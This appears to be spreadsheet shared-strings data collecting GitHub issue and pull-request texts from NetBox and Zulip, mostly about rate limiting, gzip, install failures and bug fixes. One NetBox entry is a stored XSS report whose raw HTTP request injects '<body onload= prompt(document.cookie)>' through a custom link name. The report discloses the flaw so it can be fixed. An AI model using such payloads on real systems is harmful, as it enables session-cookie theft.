Host","127.0.0.1:8001"],["Sentry-Trace","52bf9c69cc9c43d7b0e395a84d4e14f5-9fa4a9b996084d92-1"],["User-Agent","Symfony HttpClient/Curl"],["X-Forwarded-Host","netbox.redacted.net"],["X-Forwarded-Proto","https"],["X-Real-Ip","::ffff:x.x.x.x"]],"env":{"REMOTE_ADDR":"127.0.0.1","SERVER_NAME":"127.0.0.1","SERVER_PORT":"8001"}},"sdk":{"name":"sentry.python.django","version":"1.40.2","integrations":["argv","atexit","dedupe","django","excepthook","logging","modules","redis","rq","stdlib","threading"],"packages":[{"name":"pypi:sentry-sdk","version":"1.40.2"}]},"timestamp":1707398906.297148,"title":"Page not found","transaction":"/api/dcim/devices/</t>
  </si>
  <si>
    <t>data. Use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t>
  </si>
  <si>
    <t>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 a redir</t>
  </si>
  <si>
    <t>Rate Limit</t>
  </si>
  <si>
    <t>Rate Limit Failed Login Attempts; ### NetBox version. v4.0.8. ### Feature type. Change to existing functionality. ### Proposed functionality. Put in code to rate-limit failed login attempts. ### Use case. Rate limiting is a form of both security and quality control. It is important for quality of service, efficiency and security and one of the easiest and most efficient ways to control traffic. It is a basic form of security to limit hackers trying to brute-force login. . ### Database changes. None. ### External dependencies. Potentially none - there are outside packages that do this, but probably not difficult to just add code directly to do this. https://github.com/jazzband/django-defender - this looks like one of the best. https://github.com/jazzband/django-axes. https://pub.aimind.so/rate-limiting-login-attempts-in-django-with-custom-session-authentication-7d65a9d4278d. https://github.com/brutasse/django-ratelimit-backend</t>
  </si>
  <si>
    <t xml:space="preserve">XSS in api: /extras/custom-links/add, /extras/custom-links/{id}/edit/ both with param: name, /core/config-revisions/add/ with param: BANNER_MAINTENANCE; ### Deployment Type. NetBox Cloud. ### NetBox Version. v4.1.1. ### Python Version. 3.10. ### Steps to Reproduce. 1, Add or Edit a Custom Link with malicious script tags at param Name. 2, Access Object Type using Custom Link. 3, Immediately boom, Stored XSS is executed. ```POST /extras/custom-links/add/ HTTP/1.1. Host: localhost:8000. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:126.0) Gecko/20100101 Firefox/126.0. Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8. Accept-Language: en-GB,en;q=0.5. Accept-Encoding: gzip, deflate, br. Referer: http://localhost:8000/extras/custom-links/add/. Content-Type: multipart/form-data; boundary=---------------------------300193789523924448502163188369. Content-Length: 1589. Origin: http://localhost:8000. Connection: close. Cookie: csrftoken=GPFwHFgQsCVRlXGYb2Efv9gKs2SXEiIN; sessionid=jv3bmrc6goo62qohlkckic0eolv7nrde. Upgrade-Insecure-Requests: 1. Sec-Fetch-Dest: document. Sec-Fetch-Mode: navigate. Sec-Fetch-Site: same-origin. Sec-Fetch-User: ?1. X-PwnFox-Color: red. Priority: u=1. -----------------------------300193789523924448502163188369. Content-Disposition: form-data; name="csrfmiddlewaretoken". oDVU0Umj4Oip7YXSKVBW5T4WgmBHvaJZUiqgxpsZmg36iLtGLN51qSawyejuZihC. -----------------------------300193789523924448502163188369. Content-Disposition: form-data; name="name". &lt;body onload= prompt(document.cookie)&gt;. -----------------------------300193789523924448502163188369. Content-Disposition: form-data; name="object_types". 46. -----------------------------300193789523924448502163188369. Content-Disposition: form-data; name="weight". 100. -----------------------------300193789523924448502163188369. Content-Disposition: form-data; name="group_name". -----------------------------300193789523924448502163188369. Content-Disposition: </t>
  </si>
  <si>
    <t>PATCH update</t>
  </si>
  <si>
    <t>Fixes: #18263 - Iterate through a freshly queried set of CableTerminations to find endpoints in update_connected_endpoints; ### Fixes: #18263. During an API PATCH update to a Cable where one or both endpoints is changed, the signal handler `update_connected_endpoints` iterates through `self.terminations.all()` which in the case of an API call has not necessarily been refreshed after the deletion of stale endpoints at https://github.com/netbox-community/netbox/blob/b6265d828526a97962e8feefa0ff57c534d2da27/netbox/dcim/models/cables.py#L224-L240. This leads to the `local_cable_terminations` being empty here (because the pks don't match): https://github.com/netbox-community/netbox/blob/b6265d828526a97962e8feefa0ff57c534d2da27/netbox/dcim/models/cables.py#L597-L611 (Step 6 of `Cable.from_origin`), which leads to `q_filter` being empty and thus the completely unfiltered iteration at L611 potentially taking O(n) time depending on the number of terminations in the DB. This change ensures that the iteration of CableTerminations associated with a Cable after an update is freshly queried from the DB following the deletion of stale endpoints rather than relying on the (potentially stale or cached) `self.terminations` reverse relation, and thus ensuring `from_origin` is calculated correctly.</t>
  </si>
  <si>
    <t xml:space="preserve"> = ''. cf_snmp_get_community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t>
  </si>
  <si>
    <t xml:space="preserve">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SCRIPT_NAME = ''. </t>
  </si>
  <si>
    <t>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context beyond what is available in core NetBox. ### Database changes. N/A. ### External dependencies. N/A</t>
  </si>
  <si>
    <t>Closes: #19793 - Nav menu link customization; ### Closes: #19793. Changes the `PluginMenuItem` and `PluginMenuButton`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t>
  </si>
  <si>
    <t>nginx: Enable gzip compression on main content types.; Apparently, previously nginx was only compressing text/html content. This should result in a substantial savings in network traffic -- some. quick testing I did found it cut the total data transferred for. loading a logged-in zulip.com instance from 3MB to 1.2MB.</t>
  </si>
  <si>
    <t>Rate limit</t>
  </si>
  <si>
    <t>h a potentially very large value for "num_after". Exporting a stream with a ton of messages (think 100K +) could take a very long time and may be open to DOS. In particular, this is the code that calls _get_old_messages_ with potentially very large value of max_id. ``` python. queue = client.register(event_types=['message']). client._register('get_old_messages', method='GET', url='messages'). max_id = queue['max_message_id']. messages = []. print "Fetching messages...". result = client.get_old_messages({'anchor': 0,. 'num_before': 0,. 'num_after': max_id,. 'narrow': [{'operator': 'stream',. 'operand': options.stream}],. 'apply_markdown': False}). ```. My suggestion would be to loop and batch until there are no messages left - say a batch size of 1000 seems manageable. The data would be parsed &amp; written to the json file in each iteration, avoiding potential memory error due to loading 1M records before writing. The only down side I can think of would be potentially hitting the API Rate limit for streams with &gt; 100K records. Changing it to use batching would mean there's no need to fetch the "max_message_id" so this could could be removed:. ``` python. queue = client.register(event_types=['message']). max_id = queue['max_message_id']. ```. I'm not too sure why add_subscription is called - doesn't this add the specified user to the stream, which seems a bit odd? Would be nice to remove for if possible:. ``` python. client.add_subscriptions([{"name": options.stream}]). ```. BTW, I have most of the changes ready locally, though my companies IP folks have yet to sign the CLA. It's looking like that will be on the week of Jan 18. Would be interested in feedback before potentially submitting a pull request in about 1 week's time... PS. I also have code to enforce a maximum value for "num_before" &amp; "num_after" so that malicious/buggy client cannot take down the server with the get_old_messages endpoint. But need to resolve this export code, since the restriction would otherw</t>
  </si>
  <si>
    <t>PhantomJS install support for gzip; Somehow on Windows with Cygwin, when executing "vagrant up" terminal says PhantomJS downloaded as a bzip2 file, yet provisions.py crashes when attempting to install the file. This is fixed by using try/catch to try to install as a bzip2 file and catch an error and then try to install as a gzip file. "Vagrant up" later crashed at "npm install", which is fixed by running as "npm install --no-bin-links" only on Windows because Windows does not support symbolic linking. "Vagrant up" now executes fully. .</t>
  </si>
  <si>
    <t>Improve test coverage on decorators/clean up rate limiting a bit.; The first commit is pretty trivial. The second and third commits are symptomatic of what happens when a decorator has lots of conditional logic in it. It makes it really difficult to put test coverage on it. Since the code is already in production, I jumped though all the testing hoops to cover the conditional branches first, and then that allowed me to extract some of the logic to a function that's more easily testable in the future.</t>
  </si>
  <si>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</si>
  <si>
    <t>Minor changes related to rate limiting/local addresses; The first commit addresses the first bullet point in #1203 . The second commit is just minor de-duping.</t>
  </si>
  <si>
    <t>Fix potential nondeterministic test failures due to rate limiting; See https://groups.google.com/d/msgid/zulip-devel/c3d4c7d9-4b55-40b7-bdc9-f2e49ee04b43%40googlegroups.com?utm_medium=email&amp;utm_source=footer for context. There's a bug here that we don't clear the redis server's data that the tests use. So since the `zerver.tests.tests.TestMissedMessages.test_extra_context_in_huddle_missed_stream_messages` test uses a fixed set of redis keys, if that test crashes partway through at any point (e.g. because the user hit ctrl-C while the test was running) and thus doesn't clear the keys it sets through its normal completion process, we just leak that state in the redis server forever. Possible solutions include:. - add code to clear the redis server between tests. - Do something like what we do with memcached of changing key prefixes on each test run. - probably a few other options. I think the second solution is probably going to be the simplest...</t>
  </si>
  <si>
    <t>Support for Django Channels; Continuation of #1641 for follow on discussion. &gt; @timabbott . &gt; Basically, the design I'd want is one where we can use the same high-level functions on the backend (e.g. calling send_event when there's state we want to send to browsers) and having Django channels deliver the events to the browser rather than our current Tornado system doing the delivery). This was originally suggested as an approach to remove the RabbitMQ dependancy from the stack. As it stands RabbitMQ is used as a queue for mail notifications, and push updates between the main Django package and the Tornado server for event delivery to the client. Out of the box the [andrewgodwin/channels package](https://github.com/andrewgodwin/channels) ships with a Twisted dependancy called [Daphne](https://github.com/andrewgodwin/daphne/) that serves as a HTTP2/Websocket server for event delivery to clients, and uses Redis as a store for async tasks. So on the face of it, this could handle the responsibilities of RabbitMQ and help reduce code maintenance by offloading the push server functionality to another maintained project. Channels is still fairly green so the preference is likely to have support for both RabbitMQ &amp; Channels:. &gt; @timabbott . &gt; I bet that in 1-2 years channels will be clearly what we should use, and I'm happy to support work on moving towards it. But I'm not excited about migrating until we're confident channels won't be a regression. Someone building channels support as an option for Zulip would be a good start towards trying to gain said confidence :). Thoughts?</t>
  </si>
  <si>
    <t>.error: [Errno 104] Connection reset by peer. . ----------------------------------------. Command "python setup.py egg_info" failed with error code 1 in /tmp/pip-owVtmz-build/.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</si>
  <si>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Speed up our rate limiting test; `test_hit_ratelimits` sleeps for a second in order to verify that our rate limiting code works correctly. We should change it to instead mock the current time and shave 1s off our total test runtime. ```. Running zerver.tests.test_external.RateLimitTests.test_hit_ratelimits. ** Test is TOO slow: zerver.tests.test_external.RateLimitTests.test_hit_ratelimits (1.121 s). ```</t>
  </si>
  <si>
    <t>The email-mirror system should have rate limiting; Currently, it's possible to essentially DoS a Zulip server by sending tons of emails to one of its email-mirror addresses, because that code path doesn't use our standard rate-limiting logic that is applied to all API endpoints (since it's not an endpoint). We should probably do rate-limiting for incoming email by recipient/stream (or something) using a similar design (and to the extent possible, the same codepath) as our existing by-endpoint rate limiting. See zerver/lib/rate_limiter.py and zerver/decorator.py for how this is currently implemented for routes; we should just use the same registration strategy here.</t>
  </si>
  <si>
    <t>speed up rate limiting test in test_external; Patches out the `time.sleep` and mocks the `time.time` to one second ahead. resolves #2239</t>
  </si>
  <si>
    <t>contrib_bots: Prevent runaway bots with rate limiting; It's possible to create a runaway bot if you have a bot send a message to certain stimuli that in turns becomes a stimulus for the bot to send another message and so on and so forth. We can prevent that in `contrib_bots/run.py` by adding some logic to prevent runaway bots. Right now RestrictedClient make self.send_message just be client.send_message, but we can instead have a wrapper like this:. ```. def send_message(self, *args, **kwargs):. self.rate_limit(). self.client.send_message(*args, **kwargs). ```. And then have appropriate logic in `rate_limit()` and some state variable to make sure less than N messages have been sent in the last second. It might make sense to have a small class for rate limiting that RestrictedClient uses an instance of. You can do a pretty naive rate limiting scheme where you just keep the last N timestamps in a Python list and truncate it off the front as new sends come in and the list grows to size N+1.</t>
  </si>
  <si>
    <t>Add a rate limit for bots in contrib_bots #3210; To prevent bots from accidently entering an infinite message loop,. where they send messages as a reacting to their own messages,. this commit adds the RateLimit class to run.py. It specifies how. many messages can be sent in a given time interval. If this rate. is exceeded, run.py exits with an error. Fixes #3210.</t>
  </si>
  <si>
    <t>Install error on ubuntu14.04.; sudo -i . cd /root. git clone &lt;master-url&gt;. /root/zulip/scripts/setup/install. **But got this errors:**. Error running a subcommand of /root/zulip/scripts/lib/create-production-venv: ln -s zulip-venv /root/zulip/zulip-current-venv. Actual error output for the subcommand is just above this. Traceback (most recent call last):. File "/root/zulip/scripts/lib/create-production-venv", line 31, in &lt;module&gt;. run(['ln', '-s', venv_name, current_venv_path]). File "/root/zulip/scripts/lib/zulip_tools.py", line 98, in run. subprocess.check_call(args, **kwargs). File "/usr/lib/python2.7/subprocess.py", line 540, in check_call. raise CalledProcessError(retcode, cmd). subprocess.CalledProcessError: Command '['ln', '-s', 'zulip-venv', '/root/zulip/zulip-current-venv']' returned non-zero exit status 1. Zulip installation failed! The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log. _Anyone knows how to fix this?_</t>
  </si>
  <si>
    <t>analytics: Send zeros for data.user.bot in Messages Sent Over Time.; It will simplify the logic needed to process the "Sent by Me" view in. Messages Sent Over Time in stats.js. Also, we gzip the data sent from our server, so there is little additional. network usage by doing this.</t>
  </si>
  <si>
    <t>rate_limit: Provide time to retry in machine-readable form; We already provide the data in the error message: {"msg":"API usage exceeded rate limit, try again in 15.314237833 secs","result":"error"}, for API clients over the rate limit, so this should be trivial to implement. Slack does this via a `Retry-After` HTTP header, which is reasonable, but it's possible we should just change change our JSON error message format to have the time be its own field. E.g. {. "msg": "API usage exceeded rate limit",. "retry-after": "15.314",. "result": "error",. }. Forked off of discussion in #4808.</t>
  </si>
  <si>
    <t>API usage limit error thrown when hotkeys are used rapidly; When a user uses the keyboard navigation keys rapidly (such as the `n` hotkey), the user will receive the following error concerning their excess usage of the API:. ```json. {"msg":"API usage exceeded rate limit","retry-after":0.2033631802,"result":"error"}. ```. The default rate limit of the API should be thus increased, or separate API limits for the browser and the API where the browser would have a higher limit. See discussion [here](https://chat.zulip.org/#narrow/stream/backend/topic/error.20connecting.20to.20Zulip) for more context.</t>
  </si>
  <si>
    <t>Add rate limiting to the login and password change processes; Zulip historically has relied on strong password strength requirements (strong enough to protect against). But it seems like a clear improvement to add (ideally) both target-user-based and IP-based rate limiting on attempts to check passwords in Zulip. We should look into whether Django has a good library for this, but I'd be tempted to roll our own thing unless a library makes it easy to handle all the cases below. In that case, we'd want to add a function that you pass the IP and target email to, probably in `zerver/decorators.py`, for this check, and then use it in a few places:. * web login. * mobile login. * password change flow. * Any other re-authentication flow (the main one I can think of is the one we use to get your personal API key). (Note that we already have rate-limiting implemented using redis for all logged-in views in `zerver/lib/rate_limiter.py`, which we may want to extend as part of this project). @umairwaheed can you take care of this one?</t>
  </si>
  <si>
    <t>Add rate limiting to the login and password change processes; Fixes #5677</t>
  </si>
  <si>
    <t>"Apply to all of my subscriptions" option for changing stream notification settings uses a loop; I just heard from a user who got rate-limited using this feature because they had more 100 subscriptions. . To reproduce:. * Create + subscribe to more than 100 streams in development; I think there's a `manage.py populate_db` option that will do this for you. Or skip this step and just watch the 15 queries on the `run-dev.py` console that don't hit the rate limit; it's not really essential to fix it to see the ultimate failure mode. * Go to notification settings, and toggle one of the stream settings. It'll offer to change them all. Accept. To fix, we should just make this operation use a single bulk query to the server. I think the code to modify is `_update_page` in `settings_notifications.js`, though we may need to tweak the backend to support the query we want.</t>
  </si>
  <si>
    <t>invitations: Rate limit by open invitations, not all invitations; In do_invite_users, we currently limit the number of invitations someone can send to 100/day. It would be better to instead have this be "100 live invitations", where live means unexpired and where the person didn't create their account. We'll want to think a bit about how we want to do this, so definitely post a plan in #backend before starting to code too much. One idea is. * Have PreregistrationUsers link to their confirmation object. This would potentially also be useful for preventing race conditions in multiuse invite, once we add limits on the number of accounts that can be created. * Use PreregistrationUser.status to note when the user is created. . Then the query can be something like. PreregistrationUser.objects.filter(realm=.., invited_at__gt=now-settings.INVITATION_LINK_EXPIRY_DAYS, status__ne=.., confirmation__type=INVITATION). I haven't thought through the above very hard, though.</t>
  </si>
  <si>
    <t>Traceback (most recent call last):. File "/var/www/zulip/scripts/lib/setup_venv.py", line 264,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During handling of the above exception, another exception occurred:. Traceback (most recent call last):. File "/var/www/zulip/scripts/lib/create-production-venv", line 31, in &lt;module&gt;. virtualenv_args=['-p', 'python{}'.format(python_version)]). File "/var/www/zulip/scripts/lib/setup_venv.py", line 231, in setup_virtualenv. do_setup_virtualenv(cached_venv_path, requirements_file, virtualenv_args or []). File "/var/www/zulip/scripts/lib/setup_venv.py", line 268,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t>
  </si>
  <si>
    <t>nv-cach...py3-venv/bin/python3 - setuptools pkg_resources pip wheel failed with error code 2. + apt-get -y install build-essential libffi-dev libfreetype6-dev libz-dev libjpeg-dev libldap2-dev libmemcached-dev python3-dev python-dev python3-pip python-pip python-virtualenv python3-six python-six libxml2-dev libxslt1-dev libpq-dev. + sudo rm -rf /srv/zulip-venv-cache/28c46b2610f25e461725004503a2f0e9dc80c1a7/zulip-py3-venv. + sudo mkdir -p /srv/zulip-venv-cache/28c46b2610f25e461725004503a2f0e9dc80c1a7/zulip-py3-venv. + sudo virtualenv -p python3 /srv/zulip-venv-cache/28c46b2610f25e461725004503a2f0e9dc80c1a7/zulip-py3-venv. Error running a subcommand of /root/zulip/scripts/lib/create-production-venv: sudo virtualenv -p python3 /srv/zulip-venv-cache/28c46b2610f25e461725004503a2f0e9dc80c1a7/zulip-py3-venv. Actual error output for the subcommand is just above this. Traceback (most recent call last):. File "/root/zulip/scripts/lib/create-production-venv", line 31, in &lt;module&gt;. virtualenv_args=['-p', 'python{}'.format(python_version)]). File "/root/zulip/scripts/lib/setup_venv.py", line 223, in setup_virtualenv. do_setup_virtualenv(cached_venv_path, requirements_file, virtualenv_args or []). File "/root/zulip/scripts/lib/setup_venv.py", line 245, in do_setup_virtualenv. run(["sudo", "virtualenv"] + virtualenv_args + [venv_path]). File "/root/zulip/scripts/lib/zulip_tools.py", line 173, in run. subprocess.check_call(args, **kwargs). File "/usr/lib/python3.5/subprocess.py", line 581, in check_call. raise CalledProcessError(retcode, cmd). subprocess.CalledProcessError: Command '['sudo', 'virtualenv', '-p', 'python3', '/srv/zulip-venv-cache/28c46b2610f25e461725004503a2f0e9dc80c1a7/zulip-py3-venv']'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</si>
  <si>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narrow: Fix narrowing behavior when loading a new tab.; In the very early days of Zulip, we didn't have unread counts; just. the pointer, and the correct behavior when opening a new tab was to. place you near the pointer. That doesn't make any sense now that we. do have unread counts, and this corner case has been a wart for a long. time. This commit does the main behavior change here. However, there's a. bug we need to fix, where we might end up trying to pre-render a view. of the narrow based on the `all_msg_list` data before `all_msg_list`. is caught up). We need to fix that bug before we can merge this; it. should be possible to determine that using `FetchStatus` on. `all_msg_list`, or with better performance by using the `unread_msgs`. structure to determine whether the message we should be selecting is. present locally. Fixes #789. ----------------------------. For testing this and working on the outstanding bug, the test procedure is this:. * `manage.py populate_db -n2000` . * `manage.py mark_all_messages_unread`. * Login as Iago, pick a stream/topic pair, narrow and hit end in that narrow to mark as read. * Reload. Before this change, you'd be placed at the first message to that topic ever. With this change, you get placed somewhere random that appears to be the bottom, and then a fetch from the server adds a few more messages below where you're placed. Correct would be to be placed at the very bottom. I made some notes on fixing the remaining issue above. I believe what we need to do is as follows:. * For the on-reload case, first (correct but potentially not optimized version), just unconditionally do a fetch from the server when doing rendering. I have an idea for how to do this that I'll try in a commit after getting home. .</t>
  </si>
  <si>
    <t>Could not bind to IPv4 or IPv6; I got the following error while installing zulip. ```. -------------------------------------------------------------------------------. Please read the Terms of Service at. https://letsencrypt.org/documents/LE-SA-v1.2-November-15-2017.pdf. You must. agree in order to register with the ACME server at. https://acme-v01.api.letsencrypt.org/directory. -------------------------------------------------------------------------------. (A)gree/(C)ancel: a. Obtaining a new certificate. Performing the following challenges:. http-01 challenge for ce.scu.ac.ir. Cleaning up challenges. Problem binding to port 80: Could not bind to IPv4 or IPv6. IMPORTANT NOTES:. - Your account credentials have been saved in your Certbot. configuration directory at /etc/letsencrypt. You should make a. secure backup of this folder now. This configuration directory will. also contain certificates and private keys obtained by Certbot so. making regular backups of this folder is ideal. Zulip installation failed! The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log. ```. The log file also contains those line. What is the problem with binding?</t>
  </si>
  <si>
    <t>Emojis / organization avatar not exporting from realm in Zulip 1.8.1; Given a realm that was originally exported from Slack and then imported into Zulip, running the following command will produce an export as a gzipped tar (as expected):. ```. # Organization is not deactivated first. ./manage.py export -r "${REALM_NAME}" --threads 1. ```. However, when re-importing the data produced by this command, emojis and the organization avatar are not imported (presumably since they were never exported). The directory where these are contained seems to be `/home/zulip/uploads/avatars/3/emoji` and `/home/zulip/uploads/avatars/3/realm`.</t>
  </si>
  <si>
    <t>the subcommand is just above this. Traceback (most recent call last):. File "/home/zulip/scripts/lib/setup_venv.py", line 276,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During handling of the above exception, another exception occurred:. Traceback (most recent call last):. File "/home/zulip/scripts/lib/create-production-venv", line 31, in &lt;module&gt;. virtualenv_args=['-p', 'python{}'.format(python_version)]). File "/home/zulip/scripts/lib/setup_venv.py", line 243, in setup_virtualenv. do_setup_virtualenv(cached_venv_path, requirements_file, virtualenv_args or []). File "/home/zulip/scripts/lib/setup_venv.py", line 280,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</si>
  <si>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outgoing webhook bot request headers lack Content-Type; Hi,I config a bot with type outgoing,when I custom a http server to handle the hook,there is no Content-Type field in headers,here are all header fields:. ```. [ 'Host',. '127.0.0.1:7001',. 'Connection',. 'close',. 'Content-Length',. '966',. 'User-Agent',. 'python-requests/2.18.4',. 'Accept',. '*/*',. 'Accept-Encoding',. 'gzip, deflate' ]. ```. so,many framwork can't handle body without Content-Type field,so can you add this field in outgoing webhook? thanks.</t>
  </si>
  <si>
    <t>install Zulip on my server and nothing came of it. I apologize in advance for my English - translator use. Here are some details about the server: Ubuntu Server 16.04 on Xen with real IP. Installation is clean, there are no services on the server, for Zulip the whole virtual machine was allocated. After installation has been configured FQDN. "Hostname -f" view "chat-nt.ru". Domain "chat-nt.ru" configured and has the correct A-record in DNS with the server address. UFW status is inactive. No nginx or Apache installed. I also checked that no one listened to the 80 and 443 ports before running the installation script. . Every time i'm start "./zulip-server-*/scripts/setup/install --certbot --email=admin@chat-nt.ru --hostname=chat-nt.ru" I get the same error: . Failed authorization procedure. chat-nt.ru (http-01): urn:ietf:params:acme:error:unauthorized :: The client lacks sufficient authorization :: Invalid response from http://chat-nt.ru/.well-known/acme-challenge/7iT3k4MfkAu7cTkLvGcwKQhIuan4lS83LOHN8GEPXPg: "&lt;!doctype html&gt;\n&lt;html class=\"no-js\" xmlns=\"http://www.w3.org/1999/html\"&gt;\n&lt;head&gt;\n &lt;script src=\"https://cdn.optimizely.com/js/4". IMPORTANT NOTES:. - The following errors were reported by the server:. Domain: chat-nt.ru. Type: unauthorized. Detail: Invalid response from. http://chat-nt.ru/.well-known/acme-challenge/7iT3k4MfkAu7cTkLvGcwKQhIuan4lS83LOHN8GEPXPg:. "&lt;!doctype html&gt;\n&lt;html class=\"no-js\". xmlns=\"http://www.w3.org/1999/html\"&gt;\n&lt;head&gt;\n &lt;script. src=\"https://cdn.optimizely.com/js/4". To fix these errors, please make sure that your domain name was. entered correctly and the DNS A/AAAA record(s) for that domain. contain(s) the right IP address. Zulip installation failed! The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log. Please help me to understand what could be the problem.</t>
  </si>
  <si>
    <t>Gzip</t>
  </si>
  <si>
    <t>* Prevent side-effects when editing a given component . * Use semantic CSS naming to help new and existing contributors find their way easily in the code . * Globally make the code more maintainable . I'll add my candidates and my opinion on each of these, feel free to add some or [join the conversation here](https://chat.zulip.org/#narrow/stream/6-frontend/topic/SCSS.20Rewrite.20Initiative). ## Available options. * [SMACSS](https://smacss.com/book/) . * [BEM](http://getbem.com/naming/) . * [SuitCSS](https://github.com/suitcss/suit/blob/master/doc/naming-conventions.md) . * ? To be totally honest I've been working a lot with BEM (as it's used in Drupal) but anytime I can I rewrite everything to SuitCSS:. * Less typing . * PascalCase demonstrate the fact we're styling a component, quite like UI components can be thought as Classes (and are Classes in major JS Frontend frameworks) . * The `u-` prefix for utilities makes it really easy to know whether it's a component class or a helper . * The alternance between PascalCase for the "root component", camelCase after the dash for the "component elements", and double dash for the modifier, make it even more clear and readable . That's just my honest opinion having spent a lot of time during the past 7 years doing CSS and always test&amp;learning, I stick with SuitCSS naming convention. . And to be totally impartial, BEM is much more famous so maybe adoption would be easier (or less tough considering the mindset shift needed whatever convention is enforced). . ## Recommended reading material. * [A good BEM explanation, and good point about the `js-` prefix](https://medium.freecodecamp.org/css-naming-conventions-that-will-save-you-hours-of-debugging-35cea737d849) . * [Great general article about the benefits of OOCSS and its successors](http://thesassway.com/advanced/modular-css-naming-conventions) . * [If you worry about such long classnames performance, read the part on Gzip](https://en.bem.info/methodology/solved-problems/) .</t>
  </si>
  <si>
    <t>setup-certbot: Remove --force-renewal.; There’s no reason to do this unless you’re, like, trying to trip the Let’s Encrypt rate limits.</t>
  </si>
  <si>
    <t>Rate limit mirror; This is a PR for https://github.com/zulip/zulip/issues/2420. This rate limits the email mirror per realm using the same mechanism as the original rate limiter for views. Detailed explanation in the message in the first commit. This is implemented per-realm as Tim suggested this as a reasonable approach in a chat. Testing: First of all test_mirror_worker_rate_limiting should be doing a decent job at testing this works as it should. Beyond that, with the aid of the second commit this can be tested manually in the dev environment, by setting RATE_LIMITING_MIRROR_REALM_RULES to something low, like "max 2 emails per 3 minutes" and then using send_to_email_mirror:. `` ./manage.py send_to_email_mirror --fixture=zerver/tests/fixtures/email/1.txt ``. multiple times while the server is running and seeing that emails get blocked after the limit is reached, and then after the appropriate amount of time passes, they start going through again, and rate limiting works as it should. NOTE: I have no idea what is a sensible default for this. I just set it to "50 emails max (per realm) every 5 minutes" in settings.py, but this should probably be adjusted by someone who has a better sense here.</t>
  </si>
  <si>
    <t>Rate limiter</t>
  </si>
  <si>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</si>
  <si>
    <t>[WIP] Rate limit authentication; WIP for issue https://github.com/zulip/zulip/issues/5677. Probably not really mergeable yet, beyond the first 2 commits which are already submitted in https://github.com/zulip/zulip/pull/11979. So far this implements user-based limiting - in EmailAuthBackend we change the authenticate method to check if too many failed attempts to login to this user account haven't been made. No IP-based limiting yet, but it should be fairly trivial to add - just adding a rate_limit_ip function and calling it in the same place in the authenticate method, right before the rate_limit_user call, and then altering RateLimitMiddleware to set distinguishable X-RateLimit***** headers for IP/user-based limits (but we setup things to make this change easy, in the rate_limit_request_by_entity commit). . A big question in my mind is regarding the user-based limiting - while not detailed in the issue discussion - the weakness in simply blocking login attempts for a bunch of time if too many attempts to login to the user account are made, is that you can just lock someone out of their account for a while by typing in their email and an incorrect password a few times. Perhaps it would be sensible to - upon hitting the limiting, we do block further attempts and send an email message to the user informing about this happening with a generated one-time link which the user can click to reset the limit and login to their account if they want. But implementing this will take a bit more work, so first I'd some feedback on whether my approach and this suggestion are sensible.</t>
  </si>
  <si>
    <t>restore-backup Fails; Following the instructions from https://zulip.readthedocs.io/en/latest/production/maintain-secure-upgrade.html#backups:. 1. Back up the database on current server and rsync to new server. 2. Follow step 1 and 2 from here https://zulip.readthedocs.io/en/latest/production/install.html. 3. Back to page https://zulip.readthedocs.io/en/latest/production/maintain-secure-upgrade.html#backups run `/home/zulip/deployments/current/scripts/setup/restore-backup /path/to/backup` *as root* and see it fail:. ```. root@zu2:~# /home/zulip/deployments/current/scripts/setup/restore-backup ./zulip-backup-2019-04-14-16-29-35-vdtkih7f.tar.gz . tar (child): ./zulip-backup-2019-04-14-16-29-35-vdtkih7f.tar.gz: Cannot open: Permission denied. tar (child): Error is not recoverable: exiting now. gzip: stdin: unexpected end of file. tar: Child returned status 2. tar: Error is not recoverable: exiting now. + tar -C /tmp/zulip-restore-backup-ba5ih62r --keep-directory-symlink -xzf ./zulip-backup-2019-04-14-16-29-35-vdtkih7f.tar.gz. tar (child): ./zulip-backup-2019-04-14-16-29-35-vdtkih7f.tar.gz: Cannot open: Permission denied. tar (child): Error is not recoverable: exiting now. gzip: stdin: unexpected end of file. tar: Child returned status 2. tar: Error is not recoverable: exiting now. Error running a subcommand of /home/zulip/deployments/current/scripts/setup/restore-backup: tar -C /tmp/zulip-restore-backup-ba5ih62r --keep-directory-symlink -xzf ./zulip-backup-2019-04-14-16-29-35-vdtkih7f.tar.gz. Actual error output for the subcommand is just above this. Traceback (most recent call last):. File "/home/zulip/deployments/current/scripts/setup/restore-backup", line 65, in &lt;module&gt;. run(["tar", "-C", tmp, "--keep-directory-symlink", "-xzf", args.tarball]). File "/home/zulip/deployments/current/scripts/lib/zulip_tools.py", line 203, in run. subprocess.check_call(args, **kwargs). File "/usr/lib/python3.6/subprocess.py", line 291, in check_call. raise CalledProcessError(retcode, c</t>
  </si>
  <si>
    <t>Install without PGroonga fails; After #9506 unconditionally added `CREATE EXTENSION pgroonga;` to `scripts/setup/postgres-create-db`, and #12029 enabled `ON_ERROR_STOP`, the installer now fails when PGroonga is not enabled. ```. + su postgres -c 'psql -v ON_ERROR_STOP=1 -e'. CREATE USER zulip;. CREATE ROLE. ALTER ROLE zulip SET search_path TO zulip,public;. ALTER ROLE. CREATE DATABASE zulip OWNER=zulip;. CREATE DATABASE. You are now connected to database "zulip" as user "postgres". CREATE SCHEMA zulip AUTHORIZATION zulip;. CREATE SCHEMA. CREATE EXTENSION tsearch_extras SCHEMA zulip;. CREATE EXTENSION. CREATE EXTENSION pgroonga;. ERROR: could not open extension control file "/usr/share/postgresql/9.5/extension/pgroonga.control": No such file or directory. Zulip installation failed! The install process is designed to be idempotent, so you can retry after resolving whatever issue caused the failure (there should be a traceback above). A log of this installation is available in /var/log/zulip/install.log. ```. @timabbott [said](https://chat.zulip.org/#narrow/stream/43-automated-testing/topic/test-install):. &gt; OK, here are some conclusions:. &gt; * Those lines were added in 8bf80f699f3ad937b681ec10b1952d2740997546. &gt; * That was buggy in that they should have been conditional on whether we want pgroonga (we do for that Dockerfile). &gt; * It didn't cause a user-visible problem until we merged the ON_STOP_ERROR stuff.</t>
  </si>
  <si>
